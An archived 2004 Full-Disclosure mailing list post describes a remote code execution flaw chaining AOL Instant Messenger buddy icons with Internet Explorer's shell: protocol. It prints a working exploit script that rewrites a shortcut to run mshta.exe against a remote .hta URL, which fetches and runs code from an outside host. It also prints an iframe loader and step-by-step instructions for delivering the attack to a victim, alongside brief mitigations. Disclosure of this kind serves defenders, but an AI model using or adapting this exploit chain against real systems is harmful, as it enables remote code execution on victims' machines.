lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <7C6C201E0341C0408688C6A7A4F923052E6E36@LAW-MAIN.AlanPickel.com>
From: mike at alanpickel.com (Michael Evanchik)
Subject: Aol Instant Messenger/Microsoft Internet Explorer remote code execution

http://www.MichaelEvanchik.com/security/microsoft/ie/aim/aim.txt
 
 
Aol Instant Messenger/Microsoft Internet Explorer remote code execution
Feb 18, 2004

Vulnerable
----------
- Microsoft Internet Explorer 6.0 (lower was not tested)
- Microsoft Windows XP Pro
- Microsoft Windows XP Home
- Microsoft Windows 2003 Server Enterprise
- AOL Instant Messenger 5.5 to 4.3 tested

Not Vulnerable
--------------
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server
- Microsoft Windows 9X

Severity
---------
High - Remote code execution

In English
----------
    There is a problem in internet explorer where a file can be displayed as html even though
the file is not an html file.  Also the file can be run in My Computer zone where lower 
restrictions apply.  Aol instant messenger buddy icons (and maybe themes not tested) is 
just ONE way to get a file in a known location on the hard drive.  All environments where tested
fully patched from Windows Update and double checked with Microsoft Baseline Security Analyzer 1.2

Tech Stuff and Explanation
--------------------------
1. Use a 3rd party Aol instant messenger client so that it allows you to import a file that
   uses a local html execution code.  In my case I used...
<script>
var ok = new ActiveXObject("Shell.Application");
f = ok.NameSpace("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Accessories");
i= f.ParseName("Paint.lnk");
l = i.GetLink;
l.Path = "mshta.exe"
l.Arguments ="http://www.high-pow-er.com/ok.hta"
l.Save("C:\\paint.lnk");
ok.Open("C:\\paint.lnk");
</script>
   
2. Send an instant message to ANOTHER name on a real AOL Instant Messenger client to YOURSELF first.
   Make sure the victim (yourself in this case) is on your buddy list before you instant message the 
   victim (yourself).  I think that helps send the icon right away. 
   Then look in c:\documents and settings\username\application data\aim\bartcache\1\
   Look for the newest file that came in that directory (you can tell by sorting by date modified)  
   It's usually only 1k. If your unsure, open the file in Notepad to find the html above.
   This will be the filename that EVERYONE gets.  For some reason its permanent 
   for any AOL user every time the icon is imported.
3. Now your ready to create your html page on a web server. 
   In the html webpage all that is needed is simply...
<iframe src="shell:appdata\aim\bartcache\1\file name you got from step2"></iframe>
This will not need to be changed ever again since your filename and location is permanent for
everyone on AOL.

4. Send a message with a hyperlink to your page.
 
Proof of Concept?
----------------
- If the bot is online you can instant message the screen name     Michael Evanchik
  but don't be lazy, just follow the instructions above [=

Vendor Recommendations
---------------------
- America Online should not use a static directory and static file names for buddy icons. 
  It would also help to filter server side for malicious buddy icon content.
- Microsoft should pay BETTER people to test their software instead of rewards for virus writers
  Also the shell: protocol should not be allowed in html page or at 
  least consider the content Internet Zone instead of My computer Zone

Temp Fix
-------------
- Turn off buddy icons in My Aim > Edit Options > Edit Preferences > Buddy Icons
- Disable scripting in Internet Explorer
- Do not use Internet Explorer, use Mozilla Firebird (now known as FireFox  www.mozilla.org)

Credit
------
Cheng Peng Su for the shell: protocol discovery
Http equiv and jelmer for the local html execution code and examples advisories.
Liu Die Yu because of his nice webpage of bugs at http://umbrella.mx.tc/

Greets
------
- slacker my other brain
- illwill at illmob.org
- abe,rain and dolan

Contact
-------
Mike@...haelEvanchik.com
http://www.MichaelEvanchik.com - me
http://Software.High-Pow-er.com - Need a professional programmer?
http://www.High-Pow-er.com - Other, Security, Consulting

 
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040218/d769dd0f/attachment.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ